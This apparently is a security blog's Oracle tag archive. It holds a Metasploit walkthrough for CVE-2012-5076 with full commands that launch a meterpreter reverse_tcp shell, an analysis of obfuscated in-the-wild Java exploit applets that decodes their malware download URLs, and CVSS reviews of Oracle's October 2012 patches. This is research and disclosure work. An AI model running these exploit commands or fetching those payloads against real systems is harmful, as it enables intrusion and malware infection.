Tag Archives: Oracle

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Vulnerability discovered exploited in the wild by @kafeine on 2012-11-09
Metasploit PoC provided by juan vazquez on 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Funny and Efficient Anti-Virus Bypass Packed Java Applets Exploits CVE-2012-4681 in the Wild

On 24 October, during my regular malware monitoring hobby, I observed a suspicious infected server in Taiwan (www.grvb.com.tw) which is still online at the time of writing. The home page of the server loads a first Java Applet from a JAR file “Java.jar” and a second Java Applet as a single class file “eiAD.class”.

VirusTotal analysis of “Java.jar” (2990711e7cd04553260a6fbccf8ea6a6) reported 5/43 detections as Java/Downloader, and analysis of “eiAD.class” (8d4ddd1e1f41a2e8e18da097ecafecbc) reported 5/44 detections as the CVE-2012-4681 Oracle Java Gondvv exploit. The detection rate is really low, so a deeper analysis of these elements is worthwhile.

Thanks to @_sinn3r, @binjo, @jjarmoc and @maxime_tz for all their advice.

“Java.jar” (pastebin source code) JAR Java/Downloader analysis

This JAR file contains a Manifest file which reveals that the file was compiled with “Java 1.6.0_29 (Sun Microsystems Inc.)” and that the JAR file is signed with an RSA signature.

You can see that this self-signed certificate was created on 16 October and pretends to be generated and issued by Microsoft. By signing an applet, most of the restrictions on the applet are removed. Signing an applet basically means that the applet writer is vouching that the applet is safe. The user of a signed applet can accept the signed applet and have it run without most restrictions, or reject it and not have it run at all. A self-signed applet triggers a security warning pop-up advising you of the associated risks. A similar self-signed Java Applet could be generated with the java_signed_applet Metasploit exploit module.

By analyzing the source code of “Java.jar” we can see interesting arrays and functions.

“FCKME” is an array where a space represents a new entry in the array. The guys don't seem to like ESET, the anti-virus editor of NOD32 🙂

An encoded string is present and will be decoded by the “FJKOKL” function beside it. You can see that entry 29 of the “FCKME” array is used to complete the encoded text.

This function removes all the “[>|<]” values from the encoded text, with the following result.

“687474703a2f2f7777772e677672622e636f6d2e74772f75706c6f61642f757365722f66696c65732f6e756d”.

The string is encoded in hex; after decoding you get the following result, completed with “FCKME[29]”, which is “.exe”.

“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file no longer exists)

The following table provides all values of the “FCKME” array.

With all these values we are able to decode all “FCKME” variables used in the “Java.jar” code.

As you can see, Java.jar is only a self-signed Java downloader. Finally, as pointed out by @_sinn3r, this Applet is surely used as a plan B if eiAD.class is not triggered.

“eiAD.class” (pastebin source code) CVE-2012-4681 Java class file analysis

By analyzing the source code of “eiAD.class” we can see interesting arrays and functions.

This variable seems to be one more reference to the ESET anti-virus editor, and especially to the “Foxxy Software Outfoxed” blog post (thanks to @binjo).

An encoded string is present and will be decoded by the “FJKOKL” function beside it, also used in “Java.jar”. A space represents a new entry in the “JFI” array.

“FJKOKL” removes all the “[>|<]” values from the encoded text, with the following result.

“4e6f7468696e67206c696b652073756e2e206265696e672061206177742e20536f6d6574696d6573204920707574206d792053756e546f6f6c6b697420696e206d7920617373686f6c652120596f752073656520746865206765742069732061204669656c642074686174204e616d6520666f72202e657865206f6b6179202f2f2049206d65616e20676f642064616d6e2074686520676574206973206265696e672073657420666f7220746865205365637572697479204d616e6167657220666f722066696c653a2f202120476f742064616d6e20492077616e7420736f6d65206d696c6b2066726f6d206d79206d6f6d6d696573207469747a20666f72207468617420616363”.

The string is encoded in hex and after decoding you get the following result.

“Nothing like sun. being a awt. Sometimes I put my SunToolkit in my asshole! You see the get is a Field that Name for .exe okay // I mean god damn the get is being set for the Security Manager for file:/ ! Got damn I want some milk from my mommies titz for that acc”.

The following table provides all values of the “JFI” array.

With all these values we are able to decode all “JFI” variables used in the “Java.jar” code.

With all these variables and other functions, the code is able to reconstruct the CVE-2012-4681 Oracle Java vulnerability.

Another encoded string is present in “eiAD.class”, and it decodes to the same result as the one in “Java.jar”.

“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file no longer exists)
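The “FJKOKL” decoding step described above for both “Java.jar” and “eiAD.class” (strip every “[>|<]” marker, hex-decode the remainder, then append the array entry such as “FCKME[29]”), reimplemented in Python as an added example; this is not the applets' own code. The marker-laced input is constructed here because the page only shows the text after marker removal, and the FCKME array is a placeholder with only entry 29 filled, since the page's value table is not reproduced.

```python
# Marker the FJKOKL routine strips from the encoded text (from the analysis above).
MARKER = "[>|<]"

# Hex string recovered from Java.jar after marker removal (quoted in the analysis).
JAVA_JAR_HEX = ("687474703a2f2f7777772e677672622e636f6d2e74772f75706c6f6164"
                "2f757365722f66696c65732f6e756d")

# Placeholder for the space-delimited "FCKME" array: only entry 29 (".exe") is
# known from the page, so the other entries are left empty.
FCKME = [""] * 30
FCKME[29] = ".exe"


def obfuscate(hex_text: str, every: int = 4) -> str:
    """Constructed helper: re-insert the marker every `every` hex digits so the
    sample resembles the string as stored in the applet before FJKOKL runs."""
    chunks = [hex_text[i:i + every] for i in range(0, len(hex_text), every)]
    return MARKER.join(chunks)


def fjkokl(encoded: str) -> str:
    """Mimic FJKOKL: drop every marker, then hex-decode what is left.
    Raises ValueError if the residue is not clean, even-length hex."""
    cleaned = encoded.replace(MARKER, "")
    if len(cleaned) % 2 or any(c not in "0123456789abcdefABCDEF" for c in cleaned):
        raise ValueError("residue after marker removal is not clean hex")
    return bytes.fromhex(cleaned).decode("ascii", errors="replace")


def decode_payload_url(encoded: str, suffix_index: int = 29) -> str:
    """Decode the string and complete it with FCKME[29], as the applet does."""
    return fjkokl(encoded) + FCKME[suffix_index]


if __name__ == "__main__":
    sample = obfuscate(JAVA_JAR_HEX)
    print("obfuscated:", sample[:40] + "...")
    print("decoded   :", decode_payload_url(sample))
```

The same `fjkokl` routine applies to the “JFI” string in “eiAD.class”, which has no suffix appended.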

I found an occurrence of the Author variable in “lEZdLl.class” on pastebin, posted by a Guest on 24 September, which is equivalent to “eiAD.class”.

The “HGIDO” value of “lEZdLl.class” is “http://212.150.101.32/Facebook_msn.exe” (this file no longer exists).

Below is a demonstration video of the effectiveness of these files against anti-viruses.

Oracle Java Critical Patch Update October 2012 Review

Oracle has provided its Java Critical Patch Update (CPU) for October 2012, which was released on Tuesday, October 16. This CPU contains 30 security vulnerability fixes and concerns the “Java Runtime Environment” and “JavaFX” components. All of the 30 security vulnerabilities may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 15 vulnerabilities have a CVSS base score greater than or equal to 7.0.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score the reported vulnerabilities. But as you also may know, security researchers disagree with Oracle's usage of CVSS. Oracle plays with the CVSS score by creating a “Partial+” impact rating which does not exist in CVSS 2.0, and by interpreting the “Complete” rating differently than defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 7 and earlier
  • JDK and JRE 6 Update 35 and earlier
  • JDK and JRE 5.0 Update 36 and earlier
  • SDK and JRE 1.4.2_38 and earlier
  • JavaFX 2.2 and earlier
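To turn the affected-products list above into a check an administrator can run against `java -version` output, here is an added Python example (not Oracle's code). It only knows the JDK/JRE ranges from this CPU, so a version newer than these ranges is reported as not affected by this CPU only, and a family not in the table (JavaFX, or Java 8) is reported as unknown rather than guessed.

```python
import re
from typing import Optional, Tuple

# Last affected update per JDK/JRE family, taken from the affected-products
# list of the October 2012 CPU. Key: (major, minor, micro); value: update.
AFFECTED_MAX_UPDATE = {
    (1, 7, 0): 7,    # JDK and JRE 7 Update 7 and earlier
    (1, 6, 0): 35,   # JDK and JRE 6 Update 35 and earlier
    (1, 5, 0): 36,   # JDK and JRE 5.0 Update 36 and earlier
    (1, 4, 2): 38,   # SDK and JRE 1.4.2_38 and earlier
}

# Matches "1.7.0_07-b10" as well as the quoted form printed by `java -version`.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:_(\d+))?(?:-b(\d+))?")


def parse_java_version(text: str) -> Optional[Tuple[Tuple[int, int, int], int]]:
    """Return ((major, minor, micro), update) from a version string or from the
    first line of `java -version` output. None if no version is present; a
    missing update number counts as update 0."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    family = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    update = int(m.group(4)) if m.group(4) else 0
    return family, update


def is_affected(text: str) -> Optional[bool]:
    """True if the version is within an affected range of this CPU, False if it
    is a later update of a listed family, None if the family is not listed
    (or the text holds no version) so the caller does not get a false 'safe'."""
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    family, update = parsed
    limit = AFFECTED_MAX_UPDATE.get(family)
    if limit is None:
        return None
    return update <= limit


if __name__ == "__main__":
    # Constructed sample lines in the format `java -version` prints.
    for line in ('java version "1.7.0_07"', 'java version "1.7.0_09"',
                 'java version "1.6.0_35"', 'java version "1.8.0_05"'):
        print(line, "->", is_affected(line))
```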

  • CVE-2012-5083, CVE-2012-1531, CVE-2012-5086, CVE-2012-5087, CVE-2012-1533, CVE-2012-1532, CVE-2012-5076, CVE-2012-3143, CVE-2012-5088 and CVE-2012-5078 have a CVSS base score of 10.0.
  • CVE-2012-5089, CVE-2012-5084 and CVE-2012-5080 have a CVSS base score of 7.6.
  • CVE-2012-3159 and CVE-2012-5068 have a CVSS base score of 7.5.
  • CVE-2012-4416, CVE-2012-5074 and CVE-2012-5071 have a CVSS base score of 6.4.
  • CVE-2012-5069 has a CVSS base score of 5.8.
  • CVE-2012-5067, CVE-2012-5070, CVE-2012-5075, CVE-2012-5073, CVE-2012-5079, CVE-2012-5072, CVE-2012-5081 and CVE-2012-5082 have a CVSS base score of 5.0.
  • CVE-2012-3216 and CVE-2012-5077 have a CVSS base score of 2.6.
  • CVE-2012-5085 has a CVSS base score of 0.0.

Oracle Critical Patch Update October 2012 Review

Oracle has provided its Critical Patch Update (CPU) for October 2012, which was released on Tuesday, October 16. This CPU contains 109 security vulnerability fixes across 11 Oracle product families. Of the 109 security vulnerabilities, 32 may be remotely exploitable without authentication, which represents 29% of the vulnerabilities. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0 and concerns Oracle Database Server and Oracle Fusion Middleware. 6 vulnerabilities have a CVSS base score greater than or equal to 7.0.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score the reported vulnerabilities. But as you also may know, security researchers disagree with Oracle's usage of CVSS. Oracle plays with the CVSS score by creating a “Partial+” impact rating which does not exist in CVSS 2.0, and by interpreting the “Complete” rating differently than defined in CVSS 2.0.

Oracle Database Server

5 vulnerabilities are reported for “Oracle Database Server”, and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 10.0. The affected component is “Core RDBMS”.

  • CVE-2012-3132 has a CVSS base score of 6.5 and is related to the security alert emitted during August 2012.
  • CVE-2012-3137 has an Oracle CVSS base score of 10.0 but a NIST CVSS base score of 6.4.
  • CVE-2012-1751 has a CVSS base score of 6.5.
  • CVE-2012-3151 has a CVSS base score of 3.3.
  • CVE-2012-3146 has a CVSS base score of 2.1.

Oracle Fusion Middleware

26 vulnerabilities are reported for “Oracle Fusion Middleware”, and 13 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 10.0. Affected components are “Oracle JRockit”, “Oracle Reports Developer”, “Oracle Event Processing”, “Oracle WebLogic Server”, “Oracle Imaging and Process Management”, “Oracle WebCenter Sites”, “Oracle Application Server Single Sign-On”, “Oracle BI Publisher”, “Oracle Business Intelligence Enterprise Edition” and “Oracle Outside In Technology”.

  • CVE-2012-3202 has a CVSS base score of 10.0.
  • CVE-2012-3152 and CVE-2012-3153 have a CVSS base score of 6.4.
  • CVE-2011-1411 has a CVSS base score of 5.8.
  • CVE-2012-0106, CVE-2012-3183, CVE-2012-3185 and CVE-2012-3186 have a CVSS base score of 4.9.
  • CVE-2012-3175, CVE-2012-0518, CVE-2012-3194, CVE-2012-1686, CVE-2012-0071, CVE-2012-0093 and CVE-2012-3184 have a CVSS base score of 4.3.
  • CVE-2012-3193, CVE-2012-0086, CVE-2012-0090, CVE-2012-0092 and CVE-2012-0108 have a CVSS base score of 3.5.
  • CVE-2012-0095, CVE-2012-3214, CVE-2012-3217 and CVE-2012-5065 have a CVSS base score of 2.1.

Oracle E-Business Suite

9 vulnerabilities are reported for “Oracle E-Business Suite”, and 6 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.4. Affected components are “Oracle Human Resources”, “Oracle Applications Technology Stack”, “Oracle iRecruitment”, “Oracle Application Object Library”, “Oracle iStore”, “Oracle Field Service”, “Oracle Marketing” and “Oracle Applications Framework”.

  • CVE-2012-3196 has a CVSS base score of 6.4.
  • CVE-2012-3171 and CVE-2012-3222 have a CVSS base score of 5.0.
  • CVE-2012-3139, CVE-2012-3138 and CVE-2012-5058 have a CVSS base score of 4.3.
  • CVE-2012-3148 and CVE-2012-3164 have a CVSS base score of 3.5.
  • CVE-2012-3162 has a CVSS base score of 1.7.

Oracle Supply Chain Products Suite

9 vulnerabilities are reported for “Oracle Supply Chain Products Suite”, and 4 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.5. Affected components are “Oracle Agile PLM For Process”, “Oracle Agile PLM Framework” and “Oracle Agile Product Supplier Collaboration for Process”.

  • CVE-2012-3140 and CVE-2012-5092 have a CVSS base score of 5.5.
  • CVE-2012-5094 has a CVSS base score of 5.0.
  • CVE-2012-3161, CVE-2012-5093 and CVE-2012-5091 have a CVSS base score of 4.3.
  • CVE-2012-3154, CVE-2012-3200 and CVE-2012-5090 have a CVSS base score of 4.0.

Oracle PeopleSoft Products

9 vulnerabilities are reported for “Oracle PeopleSoft Products”, and 1 of them may be remotely exploitable without authentication. The CVSS score of this vulnerability is 4.3. Affected components are “PeopleSoft Enterprise PeopleTools” and “PeopleSoft Enterprise Campus Solutions”.

  • CVE-2012-3182 has a CVSS base score of 4.3.
  • CVE-2012-3201, CVE-2012-3195, CVE-2012-3198 and CVE-2012-3181 have a CVSS base score of 4.0.
  • CVE-2012-3188, CVE-2012-3176 and CVE-2012-3179 have a CVSS base score of 3.5.
  • CVE-2012-3191 has a CVSS base score of 2.1.

Oracle Siebel CRM

2 vulnerabilities are reported for “Oracle Siebel CRM”, and 1 of them may be remotely exploitable without authentication. The CVSS score of this vulnerability is 4.3. The affected component is “Siebel UI Framework”.

  • CVE-2012-3230 has a CVSS base score of 4.3.
  • CVE-2012-3229 has a CVSS base score of 4.0.

Oracle Industry Applications

2 vulnerabilities are reported for “Oracle Industry Applications”, and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.8. Affected components are “Oracle Central Designer” and “Oracle Clinical/Remote Data Capture”.

  • CVE-2012-5066 has a CVSS base score of 6.8.
  • CVE-2012-1763 has a CVSS base score of 4.0.

Oracle Financial Services Software

13 vulnerabilities are reported for “Oracle Financial Services Software”, and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.5. Affected components are “Oracle FLEXCUBE Universal Banking” and “Oracle FLEXCUBE Direct Banking”.

  • CVE-2012-3226 has a CVSS base score of 5.5.
  • CVE-2012-5063 has a CVSS base score of 5.0.
  • CVE-2012-3228 has a CVSS base score of 4.9.
  • CVE-2012-3141 and CVE-2012-5061 have a CVSS base score of 4.0.
  • CVE-2012-3225 has a CVSS base score of 3.6.
  • CVE-2012-3142, CVE-2012-3157, CVE-2012-3224, CVE-2012-3227 and CVE-2012-5064 have a CVSS base score of 3.5.
  • CVE-2012-3223 has a CVSS base score of 2.1.
  • CVE-2012-3145 has a CVSS base score of 1.5.

Oracle Sun Products Suite

18 vulnerabilities are reported for “Oracle Sun Products Suite”, and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 7.8. Affected components are “Solaris”, “Oracle GlassFish Server”, “Sun GlassFish Enterprise Server”, “Sun Java System Application Server”, “SPARC T3”, “Netra SPARC T3”, “SPARC T4” and “Netra SPARC T4”.

  • CVE-2012-3210 and CVE-2012-3189 have a CVSS base score of 7.8.
  • CVE-2012-3199, CVE-2012-0217 and CVE-2012-3204 have a CVSS base score of 7.2.
  • CVE-2012-3187 has a CVSS base score of 6.9.
  • CVE-2012-3209 has a CVSS base score of 5.6.
  • CVE-2012-3155 has a CVSS base score of 5.0.
  • CVE-2012-3207 and CVE-2012-3208 have a CVSS base score of 4.9.
  • CVE-2012-3212 has a CVSS base score of 4.7.
  • CVE-2012-3211 has a CVSS base score of 4.6.
  • CVE-2012-5095 has a CVSS base score of 4.4.
  • CVE-2012-3165 has a CVSS base score of 3.6.
  • CVE-2012-3206, CVE-2012-3203 and CVE-2012-3205 have a CVSS base score of 2.1.
  • CVE-2012-3215 has a CVSS base score of 1.7.

Oracle Virtualization

2 vulnerabilities are reported for “Oracle Virtualization”, and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 4.3. Affected components are “Secure Global Desktop” and “Oracle VM Virtual Box”.

  • CVE-2012-1685 has a CVSS base score of 4.3.
  • CVE-2012-3221 has a CVSS base score of 2.1.

Oracle MySQL

14 vulnerabilities are reported for “Oracle MySQL”, and 2 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 9.0. The affected component is “MySQL Server”.

  • CVE-2012-3163 has a CVSS base score of 9.0.
  • CVE-2012-3158 has a CVSS base score of 7.5.
  • CVE-2012-3177 has a CVSS base score of 6.8.
  • CVE-2012-3147 has a CVSS base score of 6.4.
  • CVE-2012-3166, CVE-2012-3173, CVE-2012-3144, CVE-2012-3150 and CVE-2012-3180 have a CVSS base score of 4.0.
  • CVE-2012-3149, CVE-2012-3156, CVE-2012-3167 and CVE-2012-3197 have a CVSS base score of 3.5.
  • CVE-2012-3160 has a CVSS base score of 2.1.